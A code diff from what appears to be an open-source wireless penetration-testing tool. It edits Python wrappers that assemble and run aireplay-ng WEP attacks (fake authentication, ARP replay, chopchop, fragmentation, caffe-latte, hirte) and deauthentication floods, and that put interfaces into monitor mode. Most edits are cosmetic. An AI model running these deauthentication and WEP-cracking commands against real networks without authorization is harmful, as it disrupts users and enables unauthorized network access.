@@ -65,13 +65,13 @@ class Aireplay(Thread, Dependency):
|
|||||||
Starts aireplay process.
|
Starts aireplay process.
|
||||||
Args:
|
Args:
|
||||||
target - Instance of Target object, AP to attack.
|
target - Instance of Target object, AP to attack.
|
||||||
attack_type - str, e.g. 'fakeauth', 'arpreplay', etc.
|
attack_type - str, e.g. "fakeauth", "arpreplay", etc.
|
||||||
client_mac - MAC address of an associated client.
|
client_mac - MAC address of an associated client.
|
||||||
'''
|
'''
|
||||||
super(Aireplay, self).__init__() # Init the parent Thread
|
super(Aireplay, self).__init__() # Init the parent Thread
|
||||||
|
|
||||||
self.target = target
|
self.target = target
|
||||||
self.output_file = Configuration.temp('aireplay_%s.output' % attack_type)
|
self.output_file = Configuration.temp("aireplay_%s.output" % attack_type)
|
||||||
self.attack_type = WEPAttackType(attack_type).value
|
self.attack_type = WEPAttackType(attack_type).value
|
||||||
self.error = None
|
self.error = None
|
||||||
self.status = None
|
self.status = None
|
||||||
@@ -90,7 +90,7 @@ class Aireplay(Thread, Dependency):
|
|||||||
|
|
||||||
def stop(self):
|
def stop(self):
|
||||||
''' Stops aireplay process '''
|
''' Stops aireplay process '''
|
||||||
if hasattr(self, 'pid') and self.pid and self.pid.poll() is None:
|
if hasattr(self, "pid") and self.pid and self.pid.poll() is None:
|
||||||
self.pid.interrupt()
|
self.pid.interrupt()
|
||||||
|
|
||||||
def get_output(self):
|
def get_output(self):
|
||||||
@@ -104,7 +104,7 @@ class Aireplay(Thread, Dependency):
|
|||||||
time.sleep(0.1)
|
time.sleep(0.1)
|
||||||
if not os.path.exists(self.output_file): continue
|
if not os.path.exists(self.output_file): continue
|
||||||
# Read output file & clear output file
|
# Read output file & clear output file
|
||||||
with open(self.output_file, 'r+') as fid:
|
with open(self.output_file, "r+") as fid:
|
||||||
lines = fid.read()
|
lines = fid.read()
|
||||||
self.stdout += lines
|
self.stdout += lines
|
||||||
fid.seek(0)
|
fid.seek(0)
|
||||||
@@ -114,51 +114,51 @@ class Aireplay(Thread, Dependency):
|
|||||||
from ..util.color import Color
|
from ..util.color import Color
|
||||||
Color.pl('\n{P} [?] aireplay output:\n %s{W}' % lines.strip().replace('\n', '\n '))
|
Color.pl('\n{P} [?] aireplay output:\n %s{W}' % lines.strip().replace('\n', '\n '))
|
||||||
|
|
||||||
for line in lines.split('\n'):
|
for line in lines.split("\n"):
|
||||||
line = line.replace('\r', '').strip()
|
line = line.replace("\r", "").strip()
|
||||||
if line == '': continue
|
if line == "": continue
|
||||||
if 'Notice: got a deauth/disassoc packet' in line:
|
if "Notice: got a deauth/disassoc packet" in line:
|
||||||
self.error = 'Not associated (needs fakeauth)'
|
self.error = "Not associated (needs fakeauth)"
|
||||||
|
|
||||||
if self.attack_type == WEPAttackType.fakeauth:
|
if self.attack_type == WEPAttackType.fakeauth:
|
||||||
# Look for fakeauth status. Potential Output lines:
|
# Look for fakeauth status. Potential Output lines:
|
||||||
# (START): 00:54:58 Sending Authentication Request (Open System)
|
# (START): 00:54:58 Sending Authentication Request (Open System)
|
||||||
if 'Sending Authentication Request ' in line:
|
if "Sending Authentication Request " in line:
|
||||||
self.status = None # Reset
|
self.status = None # Reset
|
||||||
# (????): Please specify an ESSID (-e).
|
# (????): Please specify an ESSID (-e).
|
||||||
elif 'Please specify an ESSID' in line:
|
elif "Please specify an ESSID" in line:
|
||||||
self.status = None
|
self.status = None
|
||||||
# (FAIL): 00:57:43 Got a deauthentication packet! (Waiting 3 seconds)
|
# (FAIL): 00:57:43 Got a deauthentication packet! (Waiting 3 seconds)
|
||||||
elif 'Got a deauthentication packet!' in line:
|
elif "Got a deauthentication packet!" in line:
|
||||||
self.status = False
|
self.status = False
|
||||||
# (PASS): 20:17:25 Association successful :-) (AID: 1)
|
# (PASS): 20:17:25 Association successful :-) (AID: 1)
|
||||||
# (PASS): 20:18:55 Reassociation successful :-) (AID: 1)
|
# (PASS): 20:18:55 Reassociation successful :-) (AID: 1)
|
||||||
elif 'association successful :-)' in line.lower():
|
elif "association successful :-)" in line.lower():
|
||||||
self.status = True
|
self.status = True
|
||||||
elif self.attack_type == WEPAttackType.chopchop:
|
elif self.attack_type == WEPAttackType.chopchop:
|
||||||
# Look for chopchop status. Potential output lines:
|
# Look for chopchop status. Potential output lines:
|
||||||
|
|
||||||
# (START) Read 178 packets...
|
# (START) Read 178 packets...
|
||||||
read_re = re.compile(r'Read (\d+) packets')
|
read_re = re.compile(r"Read (\d+) packets")
|
||||||
matches = read_re.match(line)
|
matches = read_re.match(line)
|
||||||
if matches:
|
if matches:
|
||||||
self.status = 'Waiting for packet (read %s)...' % matches.group(1)
|
self.status = "Waiting for packet (read %s)..." % matches.group(1)
|
||||||
|
|
||||||
# Sent 1912 packets, current guess: 70...
|
# Sent 1912 packets, current guess: 70...
|
||||||
sent_re = re.compile(r'Sent (\d+) packets, current guess: (\w+)...')
|
sent_re = re.compile(r"Sent (\d+) packets, current guess: (\w+)...")
|
||||||
matches = sent_re.match(line)
|
matches = sent_re.match(line)
|
||||||
if matches:
|
if matches:
|
||||||
self.status = 'Generating .xor (%s)... current guess: %s' % (self.xor_percent, matches.group(2))
|
self.status = "Generating .xor (%s)... current guess: %s" % (self.xor_percent, matches.group(2))
|
||||||
|
|
||||||
# (DURING) Offset 52 (54% done) | xor = DE | pt = E0 | 152 frames written in 2782ms
|
# (DURING) Offset 52 (54% done) | xor = DE | pt = E0 | 152 frames written in 2782ms
|
||||||
offset_re = re.compile(r'Offset.*\(\s*(\d+%) done\)')
|
offset_re = re.compile(r"Offset.*\(\s*(\d+%) done\)")
|
||||||
matches = offset_re.match(line)
|
matches = offset_re.match(line)
|
||||||
if matches:
|
if matches:
|
||||||
self.xor_percent = matches.group(1)
|
self.xor_percent = matches.group(1)
|
||||||
self.status = 'Generating .xor (%s)...' % self.xor_percent
|
self.status = "Generating .xor (%s)..." % self.xor_percent
|
||||||
|
|
||||||
# (DONE) Saving keystream in replay_dec-0516-202246.xor
|
# (DONE) Saving keystream in replay_dec-0516-202246.xor
|
||||||
saving_re = re.compile(r'Saving keystream in (.*\.xor)')
|
saving_re = re.compile(r"Saving keystream in (.*\.xor)")
|
||||||
matches = saving_re.match(line)
|
matches = saving_re.match(line)
|
||||||
if matches:
|
if matches:
|
||||||
self.status = matches.group(1)
|
self.status = matches.group(1)
|
||||||
@@ -171,17 +171,17 @@ class Aireplay(Thread, Dependency):
|
|||||||
# Parse fragment output, update self.status
|
# Parse fragment output, update self.status
|
||||||
|
|
||||||
# (START) Read 178 packets...
|
# (START) Read 178 packets...
|
||||||
read_re = re.compile(r'Read (\d+) packets')
|
read_re = re.compile(r"Read (\d+) packets")
|
||||||
matches = read_re.match(line)
|
matches = read_re.match(line)
|
||||||
if matches:
|
if matches:
|
||||||
self.status = 'Waiting for packet (read %s)...' % matches.group(1)
|
self.status = "Waiting for packet (read %s)..." % matches.group(1)
|
||||||
|
|
||||||
# 01:08:15 Waiting for a data packet...
|
# 01:08:15 Waiting for a data packet...
|
||||||
if 'Waiting for a data packet' in line:
|
if 'Waiting for a data packet' in line:
|
||||||
self.status = 'waiting for packet'
|
self.status = 'waiting for packet'
|
||||||
|
|
||||||
# Read 207 packets...
|
# Read 207 packets...
|
||||||
trying_re = re.compile(r'Trying to get (\d+) bytes of a keystream')
|
trying_re = re.compile(r"Trying to get (\d+) bytes of a keystream")
|
||||||
matches = trying_re.match(line)
|
matches = trying_re.match(line)
|
||||||
if matches:
|
if matches:
|
||||||
self.status = 'trying to get %sb of a keystream' % matches.group(1)
|
self.status = 'trying to get %sb of a keystream' % matches.group(1)
|
||||||
@@ -195,7 +195,7 @@ class Aireplay(Thread, Dependency):
|
|||||||
self.status = 'sending another packet'
|
self.status = 'sending another packet'
|
||||||
|
|
||||||
# XX:XX:XX Trying to get 1500 bytes of a keystream
|
# XX:XX:XX Trying to get 1500 bytes of a keystream
|
||||||
trying_re = re.compile(r'Trying to get (\d+) bytes of a keystream')
|
trying_re = re.compile(r"Trying to get (\d+) bytes of a keystream")
|
||||||
matches = trying_re.match(line)
|
matches = trying_re.match(line)
|
||||||
if matches:
|
if matches:
|
||||||
self.status = 'trying to get %sb of a keystream' % matches.group(1)
|
self.status = 'trying to get %sb of a keystream' % matches.group(1)
|
||||||
@@ -204,12 +204,12 @@ class Aireplay(Thread, Dependency):
|
|||||||
if 'Got RELAYED packet' in line:
|
if 'Got RELAYED packet' in line:
|
||||||
self.status = 'got relayed packet'
|
self.status = 'got relayed packet'
|
||||||
|
|
||||||
# XX:XX:XX That's our ARP packet!
|
# XX:XX:XX Thats our ARP packet!
|
||||||
if 'Thats our ARP packet' in line:
|
if 'Thats our ARP packet' in line:
|
||||||
self.status = 'relayed packet was our'
|
self.status = 'relayed packet was our'
|
||||||
|
|
||||||
# XX:XX:XX Saving keystream in fragment-0124-161129.xor
|
# XX:XX:XX Saving keystream in fragment-0124-161129.xor
|
||||||
saving_re = re.compile(r'Saving keystream in (.*\.xor)')
|
saving_re = re.compile(r"Saving keystream in (.*\.xor)")
|
||||||
matches = saving_re.match(line)
|
matches = saving_re.match(line)
|
||||||
if matches:
|
if matches:
|
||||||
self.status = 'saving keystream to %s' % matches.group(1)
|
self.status = 'saving keystream to %s' % matches.group(1)
|
||||||
@@ -220,14 +220,14 @@ class Aireplay(Thread, Dependency):
|
|||||||
# Parse Packets Sent & PacketsPerSecond. Possible output lines:
|
# Parse Packets Sent & PacketsPerSecond. Possible output lines:
|
||||||
# Read 55 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
|
# Read 55 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
|
||||||
# Read 4467 packets (got 1425 ARP requests and 1417 ACKs), sent 1553 packets...(100 pps)
|
# Read 4467 packets (got 1425 ARP requests and 1417 ACKs), sent 1553 packets...(100 pps)
|
||||||
read_re = re.compile(r'Read (\d+) packets \(got (\d+) ARP requests and (\d+) ACKs\), sent (\d+) packets...\((\d+) pps\)')
|
read_re = re.compile(r"Read (\d+) packets \(got (\d+) ARP requests and (\d+) ACKs\), sent (\d+) packets...\((\d+) pps\)")
|
||||||
matches = read_re.match(line)
|
matches = read_re.match(line)
|
||||||
if matches:
|
if matches:
|
||||||
pps = matches.group(5)
|
pps = matches.group(5)
|
||||||
if pps == '0':
|
if pps == "0":
|
||||||
self.status = 'Waiting for packet...'
|
self.status = "Waiting for packet..."
|
||||||
else:
|
else:
|
||||||
self.status = 'Replaying @ %s/sec' % pps
|
self.status = "Replaying @ %s/sec" % pps
|
||||||
pass
|
pass
|
||||||
|
|
||||||
def __del__(self):
|
def __del__(self):
|
||||||
@@ -248,10 +248,10 @@ class Aireplay(Thread, Dependency):
|
|||||||
# Interface is required at this point
|
# Interface is required at this point
|
||||||
Configuration.initialize()
|
Configuration.initialize()
|
||||||
if Configuration.interface is None:
|
if Configuration.interface is None:
|
||||||
raise Exception('Wireless interface must be defined (-i)')
|
raise Exception("Wireless interface must be defined (-i)")
|
||||||
|
|
||||||
cmd = ['aireplay-ng']
|
cmd = ["aireplay-ng"]
|
||||||
cmd.append('--ignore-negative-one')
|
cmd.append("--ignore-negative-one")
|
||||||
|
|
||||||
if client_mac is None and len(target.clients) > 0:
|
if client_mac is None and len(target.clients) > 0:
|
||||||
# Client MAC wasn't specified, but there's an associated client. Use that.
|
# Client MAC wasn't specified, but there's an associated client. Use that.
|
||||||
@@ -263,87 +263,87 @@ class Aireplay(Thread, Dependency):
|
|||||||
|
|
||||||
if attack_type == WEPAttackType.fakeauth:
|
if attack_type == WEPAttackType.fakeauth:
|
||||||
cmd.extend([
|
cmd.extend([
|
||||||
'--fakeauth', '30', # Fake auth every 30 seconds
|
"--fakeauth", "30", # Fake auth every 30 seconds
|
||||||
'-Q', # Send re-association packets
|
"-Q", # Send re-association packets
|
||||||
'-a', target.bssid
|
"-a", target.bssid
|
||||||
])
|
])
|
||||||
if target.essid_known:
|
if target.essid_known:
|
||||||
cmd.extend(['-e', target.essid])
|
cmd.extend(["-e", target.essid])
|
||||||
elif attack_type == WEPAttackType.replay:
|
elif attack_type == WEPAttackType.replay:
|
||||||
cmd.extend([
|
cmd.extend([
|
||||||
'--arpreplay',
|
"--arpreplay",
|
||||||
'-b', target.bssid,
|
"-b", target.bssid,
|
||||||
'-x', str(Configuration.wep_pps)
|
"-x", str(Configuration.wep_pps)
|
||||||
])
|
])
|
||||||
if client_mac:
|
if client_mac:
|
||||||
cmd.extend(['-h', client_mac])
|
cmd.extend(["-h", client_mac])
|
||||||
|
|
||||||
elif attack_type == WEPAttackType.chopchop:
|
elif attack_type == WEPAttackType.chopchop:
|
||||||
cmd.extend([
|
cmd.extend([
|
||||||
'--chopchop',
|
"--chopchop",
|
||||||
'-b', target.bssid,
|
"-b", target.bssid,
|
||||||
'-x', str(Configuration.wep_pps),
|
"-x", str(Configuration.wep_pps),
|
||||||
#'-m', '60', # Minimum packet length (bytes)
|
#"-m", "60", # Minimum packet length (bytes)
|
||||||
#'-n', '82', # Maximum packet length
|
#"-n", "82", # Maximum packet length
|
||||||
'-F' # Automatically choose first packet
|
"-F" # Automatically choose first packet
|
||||||
])
|
])
|
||||||
if client_mac:
|
if client_mac:
|
||||||
cmd.extend(['-h', client_mac])
|
cmd.extend(["-h", client_mac])
|
||||||
|
|
||||||
elif attack_type == WEPAttackType.fragment:
|
elif attack_type == WEPAttackType.fragment:
|
||||||
cmd.extend([
|
cmd.extend([
|
||||||
'--fragment',
|
"--fragment",
|
||||||
'-b', target.bssid,
|
"-b", target.bssid,
|
||||||
'-x', str(Configuration.wep_pps),
|
"-x", str(Configuration.wep_pps),
|
||||||
'-m', '100', # Minimum packet length (bytes)
|
"-m", "100", # Minimum packet length (bytes)
|
||||||
'-F' # Automatically choose first packet
|
"-F" # Automatically choose first packet
|
||||||
])
|
])
|
||||||
if client_mac:
|
if client_mac:
|
||||||
cmd.extend(['-h', client_mac])
|
cmd.extend(["-h", client_mac])
|
||||||
|
|
||||||
elif attack_type == WEPAttackType.caffelatte:
|
elif attack_type == WEPAttackType.caffelatte:
|
||||||
if len(target.clients) == 0:
|
if len(target.clients) == 0:
|
||||||
# Unable to carry out caffe-latte attack
|
# Unable to carry out caffe-latte attack
|
||||||
raise Exception('Client is required for caffe-latte attack')
|
raise Exception("Client is required for caffe-latte attack")
|
||||||
cmd.extend([
|
cmd.extend([
|
||||||
'--caffe-latte',
|
"--caffe-latte",
|
||||||
'-b', target.bssid,
|
"-b", target.bssid,
|
||||||
'-h', target.clients[0].station
|
"-h", target.clients[0].station
|
||||||
])
|
])
|
||||||
|
|
||||||
elif attack_type == WEPAttackType.p0841:
|
elif attack_type == WEPAttackType.p0841:
|
||||||
cmd.extend([
|
cmd.extend([
|
||||||
'--arpreplay',
|
"--arpreplay",
|
||||||
'-b', target.bssid,
|
"-b", target.bssid,
|
||||||
'-c', 'ff:ff:ff:ff:ff:ff',
|
"-c", "ff:ff:ff:ff:ff:ff",
|
||||||
'-x', str(Configuration.wep_pps),
|
"-x", str(Configuration.wep_pps),
|
||||||
'-F', # Automatically choose first packet
|
"-F", # Automatically choose first packet
|
||||||
'-p', '0841'
|
"-p", "0841"
|
||||||
])
|
])
|
||||||
if client_mac:
|
if client_mac:
|
||||||
cmd.extend(['-h', client_mac])
|
cmd.extend(["-h", client_mac])
|
||||||
|
|
||||||
elif attack_type == WEPAttackType.hirte:
|
elif attack_type == WEPAttackType.hirte:
|
||||||
if client_mac is None:
|
if client_mac is None:
|
||||||
# Unable to carry out hirte attack
|
# Unable to carry out hirte attack
|
||||||
raise Exception('Client is required for hirte attack')
|
raise Exception("Client is required for hirte attack")
|
||||||
cmd.extend([
|
cmd.extend([
|
||||||
'--cfrag',
|
"--cfrag",
|
||||||
'-h', client_mac
|
"-h", client_mac
|
||||||
])
|
])
|
||||||
elif attack_type == WEPAttackType.forgedreplay:
|
elif attack_type == WEPAttackType.forgedreplay:
|
||||||
if client_mac is None or replay_file is None:
|
if client_mac is None or replay_file is None:
|
||||||
raise Exception('Client_mac and Replay_File are required for arp replay')
|
raise Exception("Client_mac and Replay_File are required for arp replay")
|
||||||
cmd.extend([
|
cmd.extend([
|
||||||
'--arpreplay',
|
"--arpreplay",
|
||||||
'-b', target.bssid,
|
"-b", target.bssid,
|
||||||
'-h', client_mac,
|
"-h", client_mac,
|
||||||
'-r', replay_file,
|
"-r", replay_file,
|
||||||
'-F', # Automatically choose first packet
|
"-F", # Automatically choose first packet
|
||||||
'-x', str(Configuration.wep_pps)
|
"-x", str(Configuration.wep_pps)
|
||||||
])
|
])
|
||||||
else:
|
else:
|
||||||
raise Exception('Unexpected attack type: %s' % attack_type)
|
raise Exception("Unexpected attack type: %s" % attack_type)
|
||||||
|
|
||||||
cmd.append(Configuration.interface)
|
cmd.append(Configuration.interface)
|
||||||
return cmd
|
return cmd
|
||||||
@@ -388,18 +388,18 @@ class Aireplay(Thread, Dependency):
|
|||||||
def deauth(target_bssid, essid=None, client_mac=None, num_deauths=None, timeout=2):
|
def deauth(target_bssid, essid=None, client_mac=None, num_deauths=None, timeout=2):
|
||||||
num_deauths = num_deauths or Configuration.num_deauths
|
num_deauths = num_deauths or Configuration.num_deauths
|
||||||
deauth_cmd = [
|
deauth_cmd = [
|
||||||
'aireplay-ng',
|
"aireplay-ng",
|
||||||
'-0', # Deauthentication
|
"-0", # Deauthentication
|
||||||
str(num_deauths),
|
str(num_deauths),
|
||||||
'--ignore-negative-one',
|
"--ignore-negative-one",
|
||||||
'-a', target_bssid, # Target AP
|
"-a", target_bssid, # Target AP
|
||||||
'-D' # Skip AP detection
|
"-D" # Skip AP detection
|
||||||
]
|
]
|
||||||
if client_mac is not None:
|
if client_mac is not None:
|
||||||
# Station-specific deauth
|
# Station-specific deauth
|
||||||
deauth_cmd.extend(['-c', client_mac])
|
deauth_cmd.extend(["-c", client_mac])
|
||||||
if essid:
|
if essid:
|
||||||
deauth_cmd.extend(['-e', essid])
|
deauth_cmd.extend(["-e", essid])
|
||||||
deauth_cmd.append(Configuration.interface)
|
deauth_cmd.append(Configuration.interface)
|
||||||
proc = Process(deauth_cmd)
|
proc = Process(deauth_cmd)
|
||||||
while proc.poll() is None:
|
while proc.poll() is None:
|
||||||
@@ -450,3 +450,23 @@ if __name__ == '__main__':
|
|||||||
t = WEPAttackType(t)
|
t = WEPAttackType(t)
|
||||||
print(t.name, type(t.name), t.value)
|
print(t.name, type(t.name), t.value)
|
||||||
|
|
||||||
|
from ..model.target import Target
|
||||||
|
fields = 'A4:2B:8C:16:6B:3A, 2015-05-27 19:28:44, 2015-05-27 19:28:46, 6, 54e, WEP, WEP, , -58, 2, 0, 0. 0. 0. 0, 9, Test Router Please Ignore, '.split(',')
|
||||||
|
t = Target(fields)
|
||||||
|
|
||||||
|
'''
|
||||||
|
aireplay = Aireplay(t, 'replay')
|
||||||
|
while aireplay.is_running():
|
||||||
|
from time import sleep
|
||||||
|
sleep(0.1)
|
||||||
|
stdout, stderr = aireplay.get_output()
|
||||||
|
print("STDOUT>", stdout)
|
||||||
|
print("STDERR>", stderr)
|
||||||
|
'''
|
||||||
|
|
||||||
|
'''
|
||||||
|
forge = Aireplay.forge_packet('/tmp/replay_dec-0605-060243.xor', \
|
||||||
|
'A4:2B:8C:16:6B:3A', \
|
||||||
|
'00:C0:CA:4E:CA:E0')
|
||||||
|
print(forge)
|
||||||
|
'''
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from .dependency import Dependency
|
from .dependency import Dependency
|
||||||
@@ -19,14 +19,15 @@ class AirmonIface(object):
|
|||||||
self.interface = interface
|
self.interface = interface
|
||||||
self.driver = driver
|
self.driver = driver
|
||||||
self.chipset = chipset
|
self.chipset = chipset
|
||||||
|
self.mac_address = Ifconfig.get_mac(interface)
|
||||||
|
|
||||||
# Max length of fields.
|
# Max length of fields. Used for printing a table of interfaces.
|
||||||
# Used for printing a table of interfaces.
|
|
||||||
INTERFACE_LEN = 12
|
INTERFACE_LEN = 12
|
||||||
PHY_LEN = 6
|
PHY_LEN = 6
|
||||||
DRIVER_LEN = 20
|
DRIVER_LEN = 20
|
||||||
CHIPSET_LEN = 30
|
CHIPSET_LEN = 30
|
||||||
|
|
||||||
|
|
||||||
def __str__(self):
|
def __str__(self):
|
||||||
''' Colored string representation of interface '''
|
''' Colored string representation of interface '''
|
||||||
s = ''
|
s = ''
|
||||||
@@ -36,6 +37,7 @@ class AirmonIface(object):
|
|||||||
s += Color.s('{W}%s' % self.chipset.ljust(self.CHIPSET_LEN))
|
s += Color.s('{W}%s' % self.chipset.ljust(self.CHIPSET_LEN))
|
||||||
return s
|
return s
|
||||||
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def menu_header():
|
def menu_header():
|
||||||
''' Colored header row for interfaces '''
|
''' Colored header row for interfaces '''
|
||||||
@@ -51,12 +53,13 @@ class AirmonIface(object):
|
|||||||
|
|
||||||
class Airmon(Dependency):
|
class Airmon(Dependency):
|
||||||
''' Wrapper around the 'airmon-ng' program '''
|
''' Wrapper around the 'airmon-ng' program '''
|
||||||
|
|
||||||
dependency_required = True
|
dependency_required = True
|
||||||
dependency_name = 'airmon-ng'
|
dependency_name = 'airmon-ng'
|
||||||
dependency_url = 'https://www.aircrack-ng.org/install.html'
|
dependency_url = 'https://www.aircrack-ng.org/install.html'
|
||||||
|
|
||||||
base_interface = None
|
base_interface = None # Interface *before* it was put into monitor mode.
|
||||||
killed_network_manager = False
|
killed_network_manager = False # If we killed network-manager
|
||||||
|
|
||||||
# Drivers that need to be manually put into monitor mode
|
# Drivers that need to be manually put into monitor mode
|
||||||
BAD_DRIVERS = ['rtl8821au']
|
BAD_DRIVERS = ['rtl8821au']
|
||||||
@@ -65,17 +68,15 @@ class Airmon(Dependency):
|
|||||||
ARPHRD_IEEE80211_RADIOTAP = 803 #monitor
|
ARPHRD_IEEE80211_RADIOTAP = 803 #monitor
|
||||||
|
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
self.refresh()
|
|
||||||
|
|
||||||
def refresh(self):
|
|
||||||
''' Get airmon-recognized interfaces '''
|
|
||||||
self.interfaces = Airmon.get_interfaces()
|
self.interfaces = Airmon.get_interfaces()
|
||||||
|
|
||||||
|
|
||||||
def print_menu(self):
|
def print_menu(self):
|
||||||
''' Prints menu '''
|
''' Prints menu '''
|
||||||
print(AirmonIface.menu_header())
|
print(AirmonIface.menu_header())
|
||||||
for idx, iface in enumerate(self.interfaces, start=1):
|
for idx, iface in enumerate(self.interfaces, start=1):
|
||||||
Color.pl(' {G}%d{W}. %s' % (idx, iface))
|
Color.pl(" {G}%d{W}. %s" % (idx, iface))
|
||||||
|
|
||||||
|
|
||||||
def get(self, index):
|
def get(self, index):
|
||||||
''' Gets interface at index (starts at 1) '''
|
''' Gets interface at index (starts at 1) '''
|
||||||
@@ -100,13 +101,11 @@ class Airmon(Dependency):
|
|||||||
if phy == 'PHY' or phy == 'Interface':
|
if phy == 'PHY' or phy == 'Interface':
|
||||||
continue # Header
|
continue # Header
|
||||||
|
|
||||||
if len(interface.strip()) == 0:
|
|
||||||
continue
|
|
||||||
|
|
||||||
interfaces.append(AirmonIface(phy, interface, driver, chipset))
|
interfaces.append(AirmonIface(phy, interface, driver, chipset))
|
||||||
|
|
||||||
return interfaces
|
return interfaces
|
||||||
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def start_bad_driver(iface):
|
def start_bad_driver(iface):
|
||||||
'''
|
'''
|
||||||
@@ -126,6 +125,7 @@ class Airmon(Dependency):
|
|||||||
|
|
||||||
return None
|
return None
|
||||||
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def stop_bad_driver(iface):
|
def stop_bad_driver(iface):
|
||||||
'''
|
'''
|
||||||
@@ -145,6 +145,7 @@ class Airmon(Dependency):
|
|||||||
|
|
||||||
return None
|
return None
|
||||||
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def start(iface):
|
def start(iface):
|
||||||
'''
|
'''
|
||||||
@@ -166,10 +167,10 @@ class Airmon(Dependency):
|
|||||||
iface_name = iface
|
iface_name = iface
|
||||||
driver = None
|
driver = None
|
||||||
|
|
||||||
# Remember this as the 'base' interface.
|
# Remember this as the "base" interface.
|
||||||
Airmon.base_interface = iface_name
|
Airmon.base_interface = iface_name
|
||||||
|
|
||||||
Color.p('{+} enabling {G}monitor mode{W} on {C}%s{W}... ' % iface_name)
|
Color.p("{+} enabling {G}monitor mode{W} on {C}%s{W}... " % iface_name)
|
||||||
|
|
||||||
airmon_output = Process(['airmon-ng', 'start', iface_name]).stdout()
|
airmon_output = Process(['airmon-ng', 'start', iface_name]).stdout()
|
||||||
|
|
||||||
@@ -180,43 +181,51 @@ class Airmon(Dependency):
|
|||||||
enabled_iface = Airmon.start_bad_driver(iface_name)
|
enabled_iface = Airmon.start_bad_driver(iface_name)
|
||||||
|
|
||||||
if enabled_iface is None:
|
if enabled_iface is None:
|
||||||
Color.pl('{R}failed{W}')
|
Color.pl("{R}failed{W}")
|
||||||
|
|
||||||
monitor_interfaces = Iwconfig.get_interfaces(mode='Monitor')
|
monitor_interfaces = Iwconfig.get_interfaces(mode='Monitor')
|
||||||
|
|
||||||
# Assert that there is an interface in monitor mode
|
# Assert that there is an interface in monitor mode
|
||||||
if len(monitor_interfaces) == 0:
|
if len(monitor_interfaces) == 0:
|
||||||
Color.pl('{R}failed{W}')
|
Color.pl("{R}failed{W}")
|
||||||
raise Exception('Cannot find any interfaces in Mode:Monitor')
|
raise Exception("Cannot find any interfaces in Mode:Monitor")
|
||||||
|
|
||||||
# Assert that the interface enabled by airmon-ng is in monitor mode
|
# Assert that the interface enabled by airmon-ng is in monitor mode
|
||||||
if enabled_iface not in monitor_interfaces:
|
if enabled_iface not in monitor_interfaces:
|
||||||
Color.pl('{R}failed{W}')
|
Color.pl("{R}failed{W}")
|
||||||
raise Exception('Cannot find %s with Mode:Monitor' % enabled_iface)
|
raise Exception("Cannot find %s with Mode:Monitor" % enabled_iface)
|
||||||
|
|
||||||
# No errors found; the device 'enabled_iface' was put into Mode:Monitor.
|
# No errors found; the device 'enabled_iface' was put into Mode:Monitor.
|
||||||
Color.pl('{G}enabled {C}%s{W}' % enabled_iface)
|
Color.pl("{G}enabled {C}%s{W}" % enabled_iface)
|
||||||
|
|
||||||
return enabled_iface
|
return enabled_iface
|
||||||
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def _parse_airmon_start(airmon_output):
|
def _parse_airmon_start(airmon_output):
|
||||||
'''Find the interface put into monitor mode (if any)'''
|
'''Returns the interface name that was put into monitor mode (if any)'''
|
||||||
|
|
||||||
# airmon-ng output: (mac80211 monitor mode vif enabled for [phy10]wlan0 on [phy10]wlan0mon)
|
# airmon-ng output: (mac80211 monitor mode vif enabled for [phy10]wlan0 on [phy10]wlan0mon)
|
||||||
enabled_re = re.compile(r'\s*\(mac80211 monitor mode (?:vif )?enabled for [^ ]+ on (?:\[\w+\])?(\w+)\)\s*')
|
enabled_re = re.compile(r'\s*\(mac80211 monitor mode (?:vif )?enabled for [^ ]+ on (?:\[\w+\])?(\w+)\)\s*')
|
||||||
|
|
||||||
|
# airmon-ng output from https://www.aircrack-ng.org/doku.php?id=iwlagn
|
||||||
|
enabled_re2 = re.compile(r'\s*\(monitor mode enabled on (\w+)\)')
|
||||||
|
|
||||||
for line in airmon_output.split('\n'):
|
for line in airmon_output.split('\n'):
|
||||||
matches = enabled_re.match(line)
|
matches = enabled_re.match(line)
|
||||||
if matches:
|
if matches:
|
||||||
return matches.group(1)
|
return matches.group(1)
|
||||||
|
|
||||||
|
matches = enabled_re2.match(line)
|
||||||
|
if matches:
|
||||||
|
return matches.group(1)
|
||||||
|
|
||||||
return None
|
return None
|
||||||
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def stop(iface):
|
def stop(iface):
|
||||||
Color.p('{!} {R}disabling {O}monitor mode{O} on {R}%s{O}... ' % iface)
|
Color.p("{!} {R}disabling {O}monitor mode{O} on {R}%s{O}... " % iface)
|
||||||
|
|
||||||
airmon_output = Process(['airmon-ng', 'stop', iface]).stdout()
|
airmon_output = Process(['airmon-ng', 'stop', iface]).stdout()
|
||||||
|
|
||||||
@@ -277,15 +286,16 @@ class Airmon(Dependency):
|
|||||||
|
|
||||||
Airmon.terminate_conflicting_processes()
|
Airmon.terminate_conflicting_processes()
|
||||||
|
|
||||||
Color.pl('\n{+} looking for {C}wireless interfaces{W}')
|
Color.p('\n{+} looking for {C}wireless interfaces{W}... ')
|
||||||
monitor_interfaces = Iwconfig.get_interfaces(mode='Monitor')
|
monitor_interfaces = Iwconfig.get_interfaces(mode='Monitor')
|
||||||
if len(monitor_interfaces) == 1:
|
if len(monitor_interfaces) == 1:
|
||||||
# Assume we're using the device already in montior mode
|
# Assume we're using the device already in montior mode
|
||||||
iface = monitor_interfaces[0]
|
iface = monitor_interfaces[0]
|
||||||
Color.pl(' using interface {G}%s{W} (already in monitor mode)' % iface);
|
Color.pl('using interface {G}%s{W} (already in monitor mode)' % iface);
|
||||||
Color.pl(' you can specify the wireless interface using {C}-i wlan0{W}')
|
#Color.pl(' you can specify the wireless interface using {C}-i wlan0{W}')
|
||||||
Airmon.base_interface = None
|
Airmon.base_interface = None
|
||||||
return iface
|
return iface
|
||||||
|
Color.pl('')
|
||||||
|
|
||||||
a = Airmon()
|
a = Airmon()
|
||||||
count = len(a.interfaces)
|
count = len(a.interfaces)
|
